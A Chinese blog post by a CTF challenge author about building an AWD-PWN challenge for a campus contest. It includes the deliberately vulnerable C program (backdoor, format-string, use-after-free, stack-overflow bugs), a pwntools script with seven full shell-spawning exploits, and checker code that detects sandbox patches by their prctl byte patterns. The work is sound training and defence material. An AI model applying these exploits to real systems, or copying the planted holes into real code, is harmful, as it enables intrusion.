记一次AWD-PWN出题经历

前言

这篇文章大概是 24 年四月写的,也是老笔记了。当初因为一些原因没有发,现在 CTF 打的越来越少,已经渐渐淡出了竞赛。这些笔记也分享出来(虽然真的很水🥹),让有需要的师傅有个参考(太菜勿喷😭)…

一直很好奇 AWD-PWN 如何出,但困难在于 check 脚本的编写。网上这方面的资料很少,就一直鸽了😶‍🌫️ 。最近因为要校内自己玩 AWD ,于是专门花时间去研究了一下。发现了 Q1IQ 师傅在 github 上开源了 AWD-PWN-Checker ,于是抱着学习的心态阅读了整个代码。在受益匪浅的同时,又在原基础上增加了一些功能… 下面是对这次 AWD-PWN 出题过程进行的记录😎

这次 AWD-PWN 的题目部署主要参考了两个开源项目 Cardinal AWD-PWN-Checker

平台部分的部署是由我同学 Timochan 完成,我只负责了漏洞程序的编写、 check 脚本的编写、以及 exp 的编写 。

漏洞程序的出题过程

这里先介绍下我出二进制题目的想法,因为考虑到是面向学校内大一和大二的学弟,而且是第一次校内搞 AWD ,于是计划就考察基础漏洞为主,并且代码量设计的也只有三百多行,整体难度为中等偏易。

设计漏洞点如下:

  1. 留一个后门函数(避免太明显,使用 popen 函数)
  2. 格式化字符串漏洞(栈上)
  3. 格式化字符串漏洞(堆上)
  4. UAF漏洞
  5. read函数造成的栈溢出

保护策略:

  1. 不开 PIE

  2. 开启NX

  3. 可以篡改 got 表

  4. 开启 canary

  5. 去除符号表

整个逻辑以菜单的形式展开,漏洞留了较多,可以攻击的组合方式也很多(我写了七种 exp),同时放了一些迷惑性功能。

代码如下

//gcc pwn.c -o pwn -no-pie
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>

char username[0x20]="admin";
char passwd[0x20]="root";
time_t timer;
void *p[8];

void init()
{
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
}

void output(const char *string)
{
int size=strlen(string);
write(1,string,size);
}

void menu()
{
puts("1 add");
puts("2 delete");
puts("3 show");
puts("4 edit");
return;
}

int input()
{
char buf[8];
read(0,buf,8);
return atoi(buf);
}

void add()
{
int size;
int index;
puts("index>>");
index=input();
if(p[index]||index<0||index>8)
{
puts("abnormal");
exit(0);
}
puts("size>>");
size=input();
if(size<0x90&&size>0)
{
puts("abnormal");
exit(0);
}
p[index]=malloc(size);
puts("please input...");
read(0,p[index],size);
puts("ok...");
return;
}

void delete()
{
int index;
puts("index>>");
index=input();
if(!p[index]||index<0||index>8)
{
puts("abnormal");
exit(0);
}
free(p[index]);
return;
}

void show()
{
int index;
puts("index>>");
index=input();
if(!p[index]||index<0||index>8)
{
puts("abnormal");
exit(0);
}
printf(p[index]);
return;
}

void edit()
{
int index;
puts("index>>");
index=input();
if(!p[index]||index<0||index>8)
{
puts("abnormal");
exit(0);
}
puts("please input...");
read(0,p[index],0x10);
return;
}

void login()
{
char user[0x20];
char password[0x20];
output("Enter one user name >> ");
scanf("%32s",user);
output("Enter password >> ");
scanf("%32s",password);
if(strcmp(user,username) || strcmp(password,passwd))
{
output("Incorrect username or password\n\n");
exit(0);
}
output("Login Successful\n\n\n\n\n\n");
}

void leave_message(char *message,int *set_time,char *title)
{
output("Message board:\n\n");
read(0,message,0x160);
output("\n\nSet reminder time :");
scanf("%d",set_time);
if( (*set_time) >= 6 || (*set_time) <=0 )
{
output("Not meeting the requirements\n\n");
exit(0);
}
output("\n\nSet title :");
scanf("%32s",title);
output("\n\nStart timing task\n\n");
timer=time(0);
return;

}

void view_task(char *title)
{
if((*title) == NULL)
{
output("There are currently no tasks, enjoy this day!\n");
exit(0);
}
output("Tasks: ");
puts(title);
return;
}

void timed_tasks(char *message,int set_time)
{
printf("Timer is %ld\n",(time(0)-timer));
if( (time(0)-timer) > set_time )
{
output("Wtf bro! What a terrible day, this damn mission\n");
return;
}
output("Message board:\n\n");
puts(message);
return;
}

void printCurrentTime() {
time_t rawtime;
struct tm *timeinfo;

time(&rawtime);
timeinfo = localtime(&rawtime);

printf("Current time: %s", asctime(timeinfo));
return;
}

char* executeCommand(const char* command) {
char buf[1024];
FILE * p_file = NULL;

p_file = popen(command, "r");
if (!p_file) {
fprintf(stderr, "Erro to popen");
}
while (fgets(buf, 1024, p_file) != NULL) {
fprintf(stdout, "%s", buf);
}
pclose(p_file);
}

void search_word()
{
int count=0;
char word[0x20];
char buffer[0x40];
char *ptr=malloc(0x100);
output("Enter text>> ");
read(0,ptr,0x100);
output("\nTo search for words>> ");
read(0,word,0x20);
while ((ptr = strstr(ptr, word)) != NULL) {
count++;
ptr++;
}
if(count==0)
{
sprintf(buffer,"No matching found for substring %s",word);
printf(buffer);
}
else
{
printf("The number of times to match substrings is %d\n",count);
}
return;
}

void heap()
{
int choice;
output("This is Back door? Are you joking\n");
while(1)
{
menu();
puts("choice >>");
scanf("%d",&choice);
switch (choice)
{
case 1:
add();
break;
case 2:
delete();
break;
case 3:
show();
break;
case 4:
edit();
break;
default:
return;
}
}
return;
}

void game()
{
char playerChoice, computerChoice;
int result;

srand(time(NULL));

printf("Welcome to Rock, Paper, Scissors!\n");
printf("Enter 'r' for rock, 'p' for paper, or 's' for scissors.\n");

printf("Your choice: ");
scanf(" %c", &playerChoice);

switch (rand() % 3) {
case 0:
computerChoice = 'r';
printf("Computer chooses rock.\n");
break;
case 1:
computerChoice = 'p';
printf("Computer chooses paper.\n");
break;
case 2:
computerChoice = 's';
printf("Computer chooses scissors.\n");
break;
}

if (playerChoice == computerChoice) {
printf("It's a tie!\n");
} else if ((playerChoice == 'r' && computerChoice == 's') ||
(playerChoice == 'p' && computerChoice == 'r') ||
(playerChoice == 's' && computerChoice == 'p')) {
printf("You win!\n");
} else {
printf("Computer wins!\n");
}

return;
}

int main()
{
char message[0x100];
int set_time=0;
char title[0x20];
char action[0x10];
init();
login();
memset(message,0,0x100);
memset(title,0,0x20);
memset(action,0,0x10);
while(1)
{
output("action >> ");
scanf("%16s",action);
if(!strcmp(action,"task"))
{
view_task(title);
}
else if(!strcmp(action,"time"))
{
printCurrentTime();
}
else if(!strcmp(action,"message"))
{
memset(message,0,0x100);
leave_message(message,&set_time,title);
}
else if(!strcmp(action,"view"))
{
timed_tasks(message,set_time);
}
else if(!strcmp(action,"search"))
{
search_word();
}
else if(!strcmp(action,"backdoor?"))
{
heap();
}
else if(!strcmp(action,"game"))
{
game();
}
else
{
output("Illegal actione!\n\n");
return 0;
}
}
}

整个攻击的思路有两种,可以利用后门或者不利用后门。因为没开 PIE ,因此无论是溢出或者格式化字符串漏洞都可以不泄露出 libc 的情况下进行攻击。这样的速度更快,可能在一些队伍没有修复好的情况下就进行得分。而一旦防御方将后门破坏,就只能通过 ROP 或格式化字符串来泄露 libc 进行拿 shell 了。而劫持点可以是 got 表、__free_hook 、返回地址等等。攻击方式很多样,感觉不容易注意到的是 show 函数中的非栈上格式化字符串?毕竟这个功能点可能没注意看的话,发现不了格式化字符串漏洞。并且他的利用还需要布置栈链,相对来说这里是耗时最长利用的漏洞。

EXP如下

from pwn import *
def add(index,size,content):
p.sendlineafter("choice >>\n",str(1))
p.sendlineafter("index>>\n",str(index))
p.sendlineafter("size>>\n",str(size))
p.sendafter("please input...\n",content)

def delete(index):
p.sendlineafter("choice >>\n",str(2))
p.sendlineafter("index>>\n",str(index))

def show(index):
p.sendlineafter("choice >>\n",str(3))
p.sendlineafter("index>>\n",str(index))

def edit(index,content):
p.sendlineafter("choice >>\n",str(4))
p.sendlineafter("index>>\n",str(index))
p.sendlineafter("please input...",content)

def fmt(payload):
global count
p.sendlineafter("choice >>\n",str(1))
p.sendlineafter("index>>\n",str(count))
p.sendlineafter("size>>\n",str(0x100))
p.sendafter("please input...\n",payload)
p.sendlineafter("choice >>\n",str(3))
p.sendlineafter("index>>\n",str(count))
count=count+1

def fmt_stack(payload):
p.sendlineafter("action >> ","search")
p.sendlineafter("Enter text>> ",'aaaa')
p.sendlineafter("\nTo search for words>> ",payload)

def shell():
global count
p.sendlineafter("choice >>\n",str(1))
p.sendlineafter("index>>\n",str(count))
p.sendlineafter("size>>\n",str(0x100))
p.sendafter("please input...\n","/bin/sh\x00")
p.sendlineafter("choice >>\n",str(2))
p.sendlineafter("index>>\n",str(count))

def login():
p.sendlineafter("Enter one user name >> ","admin")
p.sendlineafter("Enter password >> ","root")

def execute(command):
p.sendlineafter("action >> ","message")
p.sendafter("Message board:\n\n",'a'*0x109)
p.sendlineafter("\n\nSet reminder time :",str(2))
p.sendlineafter("\n\nSet title :",command)
p.sendlineafter("action >> ","task")

def heap():
p.sendlineafter("action >> ","backdoor?")

context.log_level='debug'
context.arch='amd64'

p=remote("10.197.2.46", 8888)
e=ELF("test")
libc=ELF("./libc.so.6")

count=0
backdoor=0x401370
pop_rdi=0x4019d3
pop_rsi_r15=0x4019d1
bss_addr=0x603200
start_addr=0x400C00
main_addr=0x401742
ret=0x401443


def exp1():
login()
heap()

payload="%57$p%59$p"
fmt(payload)
p.recvuntil('\x78')
libc_base=int(p.recv(12),16)-libc.symbols['__libc_start_main']-231
print('libc_base ==> ',hex(libc_base))

p.recvuntil('\x78')
stack_addr=int(p.recv(12),16)
print('stack_addr ==> ',hex(stack_addr))
free_hook=libc_base+libc.symbols['__free_hook']
sys_addr=libc_base+libc.symbols['system']
target_addr=stack_addr-0xe8
print('target_addr ==> ',hex(target_addr))

payload=b"%"+str(e.got['atoi']&0xffff).encode()+b"c%12$hn"
fmt(payload)

payload=b"%"+str((target_addr&0xff)+2).encode()+b"c%8$hhn"
fmt(payload)

payload=b"%"+str((e.got['atoi']>>16)&0xffff).encode()+b"c%12$hn"
fmt(payload)

payload=b"%"+str(e.got['atoi']+2).encode()+b"c%80$n"
fmt(payload)

payload=b"%"+str((sys_addr>>16)&0xff).encode()+b"c%84$hhnaaaa"
payload+=b"%"+str((sys_addr&0xffff)-((sys_addr>>16)&0xff)-4).encode()+b"c%56$hn"
fmt(payload)
p.sendlineafter("choice >>",str(1))
p.sendlineafter("index>>","/bin/sh\x00")
p.sendline("cat flag")
p.interactive()

def exp2():
login()
heap()
payload="%57$p%59$p"
fmt(payload)
p.recvuntil('\x78')
libc_base=int(p.recv(12),16)-libc.symbols['__libc_start_main']-231
print('libc_base ==> ',hex(libc_base))

p.recvuntil('\x78')
stack_addr=int(p.recv(12),16)
print('stack_addr ==> ',hex(stack_addr))
print('stack_addr ==> ',hex(stack_addr))

free_hook=libc_base+libc.symbols['__free_hook']
sys_addr=libc_base+libc.symbols['system']
target_addr=stack_addr-0xe8
print('target_addr ==> ',hex(target_addr))

payload=b"%"+str(e.got['atoi']&0xffff).encode()+b"c%12$hn"
fmt(payload)

payload=b"%"+str((target_addr&0xff)+2).encode()+b"c%8$hhn"
fmt(payload)

payload=b"%"+str((e.got['atoi']>>16)&0xffff).encode()+b"c%12$hn"
fmt(payload)

payload=b"%"+str(backdoor).encode()+b"c%56$lln"
fmt(payload)
p.sendlineafter("choice >>",str(1))
p.sendlineafter("index>>","/bin/sh\x00")
p.sendline("cat flag")
p.interactive()


def exp3():
login()
heap()
add(0,0x500,'a')
add(1,0x100,'a')
delete(0)
show(0)
leak_libc=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc_base=leak_libc-0x3ebca0
print('libc_base ==> ',hex(libc_base))

add(2,0x100,'a')
delete(1)
delete(2)
free_hook=libc_base+libc.symbols['__free_hook']
sys_addr=libc_base+libc.symbols['system']
edit(2,p64(free_hook))
add(3,0x100,'/bin/sh\x00')
add(4,0x100,p64(sys_addr))
delete(3)
p.sendline("cat flag")
p.interactive()


def exp4():
login()
fmt_stack("%67$p")
p.recvuntil('\x78')
libc_base=int(p.recv(12),16)-libc.symbols['__libc_start_main']-231
print('libc_base ==> ',hex(libc_base))
sys_addr=libc_base+libc.symbols['system']
payload=b"%"+str((sys_addr&0xffff)-0x20).encode()+b"c%10$hnaaa"+p64(e.got['puts'])
fmt_stack(payload)
payload=b"%"+str(((sys_addr>>16)&0xffff)-0x20).encode()+b"c%10$hnaaa"+p64(e.got['puts']+2)
fmt_stack(payload)
payload=b"%"+str(((sys_addr>>32)&0xffff)-0x20).encode()+b"c%10$hnaaa"+p64(e.got['puts']+4)
fmt_stack(payload)
execute("/bin/sh\x00")
p.sendline("cat flag")
p.interactive()

def exp5():
login()
p.sendlineafter("action >> ","message")
p.sendafter("Message board:\n\n",'a'*0x109)
p.sendlineafter("\n\nSet reminder time :",str(2))
p.sendlineafter("\n\nSet title :",'b'*8)
sleep(2)
p.sendlineafter("action >> ","view")
p.recvuntil('a'*0x109)
canary=u64(p.recv(7).rjust(8,b"\x00"))
print('canary ==> ',hex(canary))

p.sendlineafter("action >> ","message")
payload=b'a'*0x108+p64(canary)+p64(0xdeadbeef)
payload+=p64(pop_rdi)+p64(e.got['puts'])+p64(e.plt['puts'])+p64(main_addr)
p.sendafter("Message board:\n\n",payload)
p.sendlineafter("\n\nSet reminder time :",str(2))
p.sendlineafter("\n\nSet title :",'b'*8)
p.sendlineafter("action >> ","wtf")
libc_base=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.symbols['puts']
print('libc_base ==> ',hex(libc_base))
sys_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + next(libc.search(b"/bin/sh"))
p.sendlineafter("Enter one user name >> ","admin")
p.sendlineafter("Enter password >> ","root")

p.sendlineafter("action >> ","message")
payload=b'a'*0x108+p64(canary)+p64(0xdeadbeef)
payload+=p64(pop_rdi)+p64(bin_sh_addr)+p64(ret)+p64(sys_addr)
p.sendafter("Message board:\n\n",payload)
p.sendlineafter("\n\nSet reminder time :",str(2))
p.sendlineafter("\n\nSet title :",'b'*8)
p.sendlineafter("action >> ","wtf")
p.sendline("cat flag")
p.interactive()

def exp6():
login()
p.sendlineafter("action >> ","message")

p.sendafter("Message board:\n\n",'a'*0x109)
p.sendlineafter("\n\nSet reminder time :",str(2))
p.sendlineafter("\n\nSet title :",'b'*8)

sleep(2)
p.sendlineafter("action >> ","view")
p.recvuntil('a'*0x109)
canary=u64(p.recv(7).rjust(8,b"\x00"))
print('canary ==> ',hex(canary))
p.sendlineafter("action >> ","message")
payload=b'a'*0x108+p64(canary)+p64(0xdeadbeef)+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(bss_addr)+p64(0xdeadbeef)+p64(e.plt['read'])+p64(pop_rdi)+p64(bss_addr)+p64(backdoor)
p.sendafter("Message board:\n\n",payload)
p.sendlineafter("\n\nSet reminder time :",str(2))
p.sendlineafter("\n\nSet title :",'b'*8)

p.sendlineafter("action >> ","wtf")

sleep(0.2)
p.send('/bin/sh\x00')
p.sendline("cat flag")
p.interactive()

def exp7():
p.sendlineafter("Enter one user name >> ","admin")
p.sendlineafter("Enter password >> ","root")
p.sendlineafter("action >> ","search")
p.sendlineafter("Enter text>> ",'aaaa')
payload=b"%"+str(0x1370-0x20).encode()+b"c%10$hnaaaa"+p64(e.got['puts'])
p.sendlineafter("\nTo search for words>> ",payload)
p.sendlineafter("action >> ","message")
p.sendafter("Message board:\n\n",'a'*0x109)
p.sendlineafter("\n\nSet reminder time :",str(2))
p.sendlineafter("\n\nSet title :",'/bin/sh\x00')
p.sendlineafter("action >> ","task")
p.sendline("cat flag")
p.interactive()


def main():
functions = {
'exp1': exp1,
'exp2': exp2,
'exp3': exp3,
'exp4': exp4,
'exp5': exp5,
'exp6': exp6,
'exp7': exp7
}

function_name = sys.argv[1]
if function_name in functions:
functions[function_name]()
else:
print("Invalid function name")
sys.exit(1)

if __name__ == '__main__':
main()

针对二进制程序本身的设计上面简单提及了一下,因为我觉得最重要的收获是阅读了 AWD-PWN-Checker 代码所学习到 check 脚本的编写思路,以及对代码编写能力的提升。

check 脚本的设计思路

Q1IQ 师傅在 AWD-PWN-Checker 中的设计思路是用主模块 main.py 加载具体做 check 的模块 pwncheck.py ,在裁判端存储一个正常的程序,check 哪个靶机时就将远端的程序下载到裁判端。用 lief 库可以解析 ELF 文件,通过和正常的程序比较去判断目标文件本身是否做了非法的修改。利用 zio 库与远端的程序进行交互,判断服务是否正常。

在原本的 check 点中检测了

  1. 服务是否还存在(能否正常连接并交互)

  2. 检查服务的基础功能是否正常

  3. 文件的 size 是否被修改

  4. got plt 表是否被修改

  5. free 函数是否被改成了 nop

在阅读完整个代码逻辑后,我打算增加一些检测点。首先是在 AWD 中上通防,我认为是很影响公平性的行为,使用 evilPatcher 可以很轻易给程序加一个沙箱,禁用掉关键的系统调用,让攻击者即使利用漏洞成功,在执行 execve 系统调用时,进程也会被 kill 。导致防御者在没有任何修复操作的情况下也不会丢分,这违背了 AWD 比赛的初衷。

evilPatcher 这个工具思路是劫持 _libc_start_main 函数的一个参数 main.eh_frame 段,在程序调用 main 函数之前就已经执行了 prctl 系统调用。针对这个特征我增加了两个检测点,首先是 start 函数中机器码不可以被修改(这样入口函数是可以正常触发的),即使 fix 也不可能在 main 函数调用前就进行修复操作。另外就是提取 .eh_frame 段中数据,进行特征码匹配。有些漏洞的修补是需要在 .eh_frame 段中写入汇编代码的,但无论如何也不会执行系统调用 prctl ,因此控制 al 寄存器并执行 int 0x80syscall 的可以判定上了通防。

sys_prctl ==> mov al,0x9d ; syscall ==> B0 9D 0F 05
sys_prctl ==> mov al,0xac ; int 0x80 ==> B0 AC CD 80

同时我针对程序节的大小,起始地址,数量也都做了检查,防止有其他操作在没有改变文件大小的情况下对节进行一些修改。

另外我改写了下载靶机程序的函数,原本 Q1IQ 师傅是利用的 ssh 公私钥文件进行的文件免密下载。但我们部署这个平台是给每个靶机两个用户,一个是 ctf 低权限普通用户(参赛者使用的),一个是 root 。我实现的方式是直接通过 root 的密码进行文件下载。

原本测试交互的函数肯定是要去改写成适应当前二进制程序的,除此之外我还修改了主模块中的逻辑。原本使用方法是 python3 main.py pwncheck.py --host 1.2.3.4 --port 9999 ,只能指定一个靶机检测。我新增了一个 ip 列表,可以自动去检测所有的靶机状态。同时因为网络原因可能造成的误判,又新增了一个二次裁决的功能。所有第一次判断异常的靶机不会扣分,而是再进行两次 check ,接下来两次 check 结果一样的话,才确定靶机的防御异常进行扣分。

阅读 AWD-PWN-Checker 的收获

importlib模块导包

创建 demo.py ,代码如下

import importlib.util

# 创建模块规范对象
spec = importlib.util.spec_from_file_location("test", "./test.py")


# 根据规范对象加载模块
example_module = importlib.util.module_from_spec(spec)

# 执行模块
spec.loader.exec_module(example_module)

# 调用模块中的函数
example_module.hello()

创建 test.py,代码如下

def hello():
print("it is test")

二者位于同一目录,运行 demo.py 可以成功输出 is is test

import 导包类似,但是将固定的模块名称设置为函数参数,可以在面对不同需求时,增加了程序的灵活性。

down_from_remote函数(修改)

该函数利用 ssh 公私钥文件实现从远程服务端下载文件

def down_from_remote(host, remotepath, localpath, user="root", port=22):
#host为目标主机ip remotepath为目标主机需要下载的文件路径 localpath是要将文件下载到本机的路径 user是要连接主机的用户名
keyfile = open('./awd_rsa', 'r')
private_key = paramiko.RSAKey.from_private_key(keyfile)
t = paramiko.Transport((host, port))
t.connect(username=user, pkey=private_key)
sftp = paramiko.SFTPClient.from_transport(t)
sftp.get(remotepath, localpath)

down_from_remote("192.168.0.217","/home/zikh/Desktop/flag","./flag",'zikh')
  1. 先用 ssh-keygen -t rsa 生成一组公私钥对
  2. 执行 ssh-copy-id username@xx.xx.xx.xx 将公钥文件上传至目标主机
  3. 将私钥文件备份,拷贝至当前目录名为 awd_rsa
  4. 配置好 down_from_remote 函数的参数,进行文件下载

lief库

这个库可以去解析 ELF 文件,包括但不限于获取节信息,符号表信息,指定地址中的数据等等。利用该库中提供的各种函数,可以去来检查二进制文件是否进行了非法修改。

以检查 got 表是否被修改为例,可以先将靶机中的目标文件下载到裁判端,然后同时获取 .got.plt 节的地址。通过该地址解析出整个节的数据,让目标文件和原文件提取的数据作比较,就能判断出 got 表是否被修改。

def compare_data(check_elf, ordinary_elf, address, size):
check_data = check_elf.get_content_from_virtual_address(address, size)
ordinary_data = ordinary_elf.get_content_from_virtual_address(
address, size)
if operator.eq(check_data, ordinary_data):
return True
else:
return False

def check_got(check_elf, ordinary_elf):
section = check_elf.get_section('.got.plt')
got_address = section.virtual_address
if (Checker.compare_data(check_elf, ordinary_elf, got_address, section.size)):
return True
else:
return False

还可以用特征码,静态检测的方式来检查 call free 的代码是否被 nop 掉(目前这里还可以改进,现在是手动传参 call free 指令的地址和指令字节数),以及是否在 .eh_frame 段中加入了执行 prctl 的汇编指令等等。

增加

check_section

用来判断待 check 文件和原文件二者节的数量、节的地址、节的大小是否有被篡改

def check_section(check_elf, ordinary_elf):
sections1 = check_elf.sections
sections2 = ordinary_elf.sections
if len(sections1) != len(sections2):
return False
for i in range(len(sections1)):
section1 = sections1[i]
section2 = sections2[i]

if section1.virtual_address != section2.virtual_address:
return False

if section1.size != section2.size:
return False
return True

check_func

用来判断指定函数的代码是否被修改,通常 function_name 指定为 _start 函数,因为使用 evilPatcher 工具上通防的话,会去修改 _start 函数中调用 __libc_start_main 时的第一个参数(原本是 main)为 .eh_frame 段地址,执行 prctrl 系统调用加沙箱。正常修补程序漏洞的话是无需对 _start 函数进行任何修改,因此判断 _start 函数代码是否被修改可以有效检测防御者是否采取了合适的方法修补漏洞

def check_func(check_elf, ordinary_elf, function_name = "_start"):
for symbol in check_elf.symbols:
if symbol.name == function_name:
function = symbol
break
if(compare_data(check_elf, ordinary_elf, function.value, function.size)):
return True
else:
return False

check_sandbox

check_sandbox 函数主要是对 check_prctl_in_ehframe 函数的封装,使用 evilPatcher 工具或者自己上沙箱的最好方式都是在 ehframe 段中写入 prctl 系统调用的汇编代码,并劫持执行流到此处执行。我选择特征码识别的静态检测,来识别 prctl 系统调用(考虑到加沙箱,大部分都会使用 evilPatcher ,因此是针对该工具加的系统调用特征码进行识别)

def check_sandbox(check_elf):
section = check_elf.get_section('.eh_frame')
ehframe_address = section.virtual_address
return check_prctl_in_ehframe(check_elf, ehframe_address, section.size)
def check_prctl_in_ehframe(check_elf, address, size):
"sys_prctl ==> mov al,0x9d ; syscall ==> B0 9D 0F 05"
"sys_prctl ==> mov al,0xac ; int 0x80 ==> B0 AC CD 80"
arch = check_elf.header.machine_type
if arch == lief.ELF.ARCH.x86_64:
prctl_opcode = [0xB0, 0x9D, 0x0F, 0x05]
elif arch == lief._lief.ELF.ARCH.i386:
prctl_opcode = [0xB0, 0xAC, 0xCD, 0x80]
else:
pass
check_data = check_elf.get_content_from_virtual_address(address, size)

check_data_list = check_data.tolist()
print(check_data_list)
for i in range(len(check_data_list) - len(prctl_opcode) - 1):
if prctl_opcode == check_data_list[i:i+len(prctl_opcode)] :
return False
return True

download_file_via_ssh

原本下载文件的方式是通过 ssh 公钥来下载的,新增一个函数通过密码来下载

def download_file_via_ssh(hostname, port, username, password, remote_file_path, local_file_path):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

client.connect(hostname, port, username, password)

sftp_client = client.open_sftp()
sftp_client.get(remote_file_path, local_file_path)

sftp_client.close()
client.close()
print('File download completed!')

总结

具体检测的功能,其实并不难写。通过阅读 AWD-PWN-Checker 代码,给我最大的收获是整个代码的编写思路。

在整个 main.py 模块中的代码很简洁,就是去解析命令行参数并调用指定模块中的 check 函数进行后续的处理。这里将具体 check 的代码封装在了另一个 py 文件中,定义了 Checker 类,并在里面封装了具体检测文件的函数。其中将 check 函数作为入口

# coding=utf-8
import sys
from argparse import ArgumentParser
import importlib.util


def main():
arg_parser = ArgumentParser(description='AWD Pwn Checker')
arg_parser.add_argument('-t', '--timeout', type=int, default=10,
help='Timeout for check completion (default: 10)')
arg_parser.add_argument('-H', '--host', type=str, help='Target host')
arg_parser.add_argument('-p', '--port', type=int, help='Target port')
arg_parser.add_argument('module', type=str,
help='Path of module to find checker script')
args = arg_parser.parse_args()

if not args.module:
arg_parser.print_usage()
sys.exit(1)
try:
module_spec = importlib.util.spec_from_file_location(
"Checker", args.module)
check_module = importlib.util.module_from_spec(module_spec)
module_spec.loader.exec_module(check_module)

ctx = check_module.Context(vars(args))
check_result = check_module.Checker.check(ctx)

except Exception as e:
print(f"Exception: {e}")

print(f"Check result for {args.module}:")
print(check_result)


if __name__ == '__main__':
main()

而在后续的改写中,我希望在应对不同题目时 pwncheck.py 脚本尽可能的不去改动(也就是通用型),而对于不同题目的基础功能 check 时肯定都要进行定制。于是我将不同的功能检查函数放在了 file_check 文件中。

总结:自己代码能力太弱了🥲 。我将 docker、checker以及题目源码和 exp.py都上传到了百度网盘,需要的师傅可以自己拿。链接: https://pan.baidu.com/s/1lFIPX0TDxsg7Dh074VtJbQ?pwd=zikh